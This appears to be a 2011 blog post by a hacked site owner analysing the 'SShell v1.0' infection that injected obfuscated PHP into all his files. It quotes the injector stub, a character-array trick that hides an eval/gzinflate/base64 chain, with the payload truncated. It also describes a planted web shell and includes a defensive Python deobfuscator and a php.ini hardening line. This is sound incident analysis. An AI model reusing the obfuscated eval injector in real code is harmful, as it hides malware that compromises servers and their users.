Malware Alert - September 2011 - SShell v.1.0

I was very unfortunate to discover today that someone had broken into my hosting account. This happened within the last few days, but went unnoticed by me until today.

All of my PHP files were infected with the following piece of code:

<?php  
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

I was really upset. Doing a search on Google for similar complaints, I found this report at Stack Overflow: LINK

A guy over there linked to an article at PHP-Beginners.com for more details: LINK

The guys at PHP Beginners were kind enough to share a cleaner script that removes the malicious code from your PHP files, and although it did a great job, that wasn't enough for me. I was really, really upset that the security of my hosting account had been compromised, so I decided to dig deeper into the problem. Examining my error logs and all the raw access logs associated with my hosting account, I discovered a good number of suspicious files in the "wp-content" folder of my WordPress installation and in the "cgi-bin" folder of an old video sharing website I developed last year, which is no longer active.

I downloaded those and started to reverse engineer the whole thing, relying heavily on two great tools: PHP Decoder and PHP Formatter.

It's worth mentioning here that I ended up using these two because I figured out that the whole:

<?php  
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('FZhHsoXIkkSX8+sbA+Cira0HaK01kza01prV96sdZGaEux/P8kqHf+qvnaohPcp/snQvcfT/ijKfi/Kf/...');
?>

...thing is actually an obfuscated way of executing nested eval(gzinflate(base64_decode('SOME_BASE64_ENCODED_STRING'))); instructions. Here is the entire decoded piece of malicious code that's inserted into each PHP file on your server: LINK
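As an added example (not the author's code and not the PHP-Beginners cleaner), the following Python resolves the character-array trick above statically, the way a file scanner would and without executing anything: it parses the $wp_salt table, follows the $wp_salt[N] lookups in the create_function body and reconstructs the string the stub hands to create_function. The sample is the injector stub from this post with its base64 payload replaced by a placeholder; the regexes are tuned to this stub's one-line layout.

```python
import re

# Constructed sample: the injector stub quoted in the post, with the long base64
# payload replaced by a placeholder (the real payload is not reproduced here).
SAMPLE_PHP = r'''<?php
$md5 = "f8037bfb868e6c652d88c420b78404cd";
$wp_salt = array("(","i","4","o","e",'f','v','l',"$",'z',"r",'6','t',"c","g","n",')','b','s',"d",";",'_','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[4].$wp_salt[6].$wp_salt[22].$wp_salt[7].$wp_salt[0].$wp_salt[14].$wp_salt[9].$wp_salt[1].$wp_salt[15].$wp_salt[5].$wp_salt[7].$wp_salt[22].$wp_salt[12].$wp_salt[4].$wp_salt[0].$wp_salt[17].$wp_salt[22].$wp_salt[18].$wp_salt[4].$wp_salt[11].$wp_salt[2].$wp_salt[21].$wp_salt[19].$wp_salt[4].$wp_salt[13].$wp_salt[3].$wp_salt[19].$wp_salt[4].$wp_salt[0].$wp_salt[8].$wp_salt[6].$wp_salt[16].$wp_salt[16].$wp_salt[16].$wp_salt[20]);
$wp_add_filter('BASE64_PAYLOAD_OMITTED');
?>'''

# `$name = array(...);` of quoted strings; non-greedy, so it stops at the first
# `);`, which suits the single-line tables this injector writes.
ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*array\((.*?)\);', re.S)
ELEM_RE = re.compile(r'"([^"]*)"' + r"|'([^']*)'")
# create_function('$'.'v', $tbl[i].$tbl[j]...): parameter name + concatenation.
CREATE_FN_RE = re.compile(
    r"create_function\(\s*'\$'\.'(\w+)'\s*,\s*((?:\$\w+\[\d+\]\s*\.?\s*)+)\)")
INDEX_RE = re.compile(r'\$(\w+)\[(\d+)\]')


def parse_char_arrays(src):
    """Map each quoted-string array in `src` to its list of elements."""
    tables = {}
    for m in ARRAY_RE.finditer(src):
        tables[m.group(1)] = [e.group(1) if e.group(1) is not None else e.group(2)
                              for e in ELEM_RE.finditer(m.group(2))]
    return tables


def deobfuscate_create_function(src):
    """Return [(param_name, reconstructed_source)] for each create_function
    body assembled from char-array lookups; unknown or out-of-range lookups
    drop that candidate instead of guessing."""
    tables = parse_char_arrays(src)
    out = []
    for m in CREATE_FN_RE.finditer(src):
        pieces = []
        for name, idx in INDEX_RE.findall(m.group(2)):
            table = tables.get(name, [])
            if int(idx) >= len(table):
                break
            pieces.append(table[int(idx)])
        else:  # every lookup resolved: the body is fully reconstructed
            out.append((m.group(1), ''.join(pieces)))
    return out


def find_injector(src):
    """Return the deobfuscated bodies that feed a decoder chain into eval()."""
    return [body for _, body in deobfuscate_create_function(src)
            if 'eval(' in body and ('gzinflate(' in body or 'base64_decode(' in body)]
```

Running every .php file under the web root through find_injector() gives a triage list of infected files; removing the injected block is still the cleaner script's job.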

So the malicious code injected into my PHP files was basically making use of PHP's output buffering functionality: it altered the output of my scripts, adding a handful of malicious links to all of them. (By the way, I keep a list of all the links, if anyone's interested in acquiring it.) This code also referred to one of the files placed in the "cgi-bin" folder of that old video sharing website, so I immediately started decoding all my findings, and here's what I got: LINK

To my dismay, it turned out that the virus can do much more harm than it first appeared. One of the malware files in the "cgi-bin" folder is a PHP web shell that gives the hackers full access to the server: it allows them to browse through your files, get at your databases and FTP credentials, execute malicious pieces of PHP code and pretty much do anything they want...

The "wp-content" folder contained almost the same files as the "cgi-bin" folder, with one additional file called "wp-thumb-creator.php". I was terrified when I saw its decoded code (LINK), as this was the file that did all the injection. It seems to have some connection with ydmns1.com, which is hosted somewhere in Germany, so either Germans are behind the attack or a machine in Germany has been compromised and is being used by the hackers...

Anyway, that whole thing seems to be called !SShell v. 1.0 shadow edition!, so please spread the word about it and help other people protect themselves from it. Although the cleaner script that the PHP-Beginners.com guys supplied does a great job, you won't stop this from happening again unless you find and delete the SShell file and the "wp-thumb-creator.php" file that injects the malicious code into all of your PHP files. You may also want to add the following line to your php.ini file as a preventive measure, so that even if you get infected again, their code won't be able to run:

disable_functions = create_function,gzinflate,base64_decode

It looks like the mass attacks with this malware started this month (September 2011), as I see a growing number of people complaining about it. !SShell v. 1.0 shadow edition! appears to be a modified version of the Russian c99madshell script; full info on it can be found here: LINK

Marin Bezhanov
